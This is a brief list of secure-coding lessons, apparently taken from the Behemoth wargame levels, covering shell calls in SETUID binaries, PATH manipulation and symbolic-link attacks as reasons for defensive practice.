  - Commands such as /bin/sh should rarely be invoked, especially within a SETUID binary, since doing so hands a privileged shell to anyone who can reach that code path
  - Binaries that should not have been vulnerable turned out to be exploitable due to calling /bin/sh
- Always use the full path of a command
  - PATH environment variable attacks were possible on Behemoth 2
- Never read files that can be created by an untrusted user
  - Symbolic links can be used to exploit this weakness, as seen in Behemoth 2 and Behemoth 4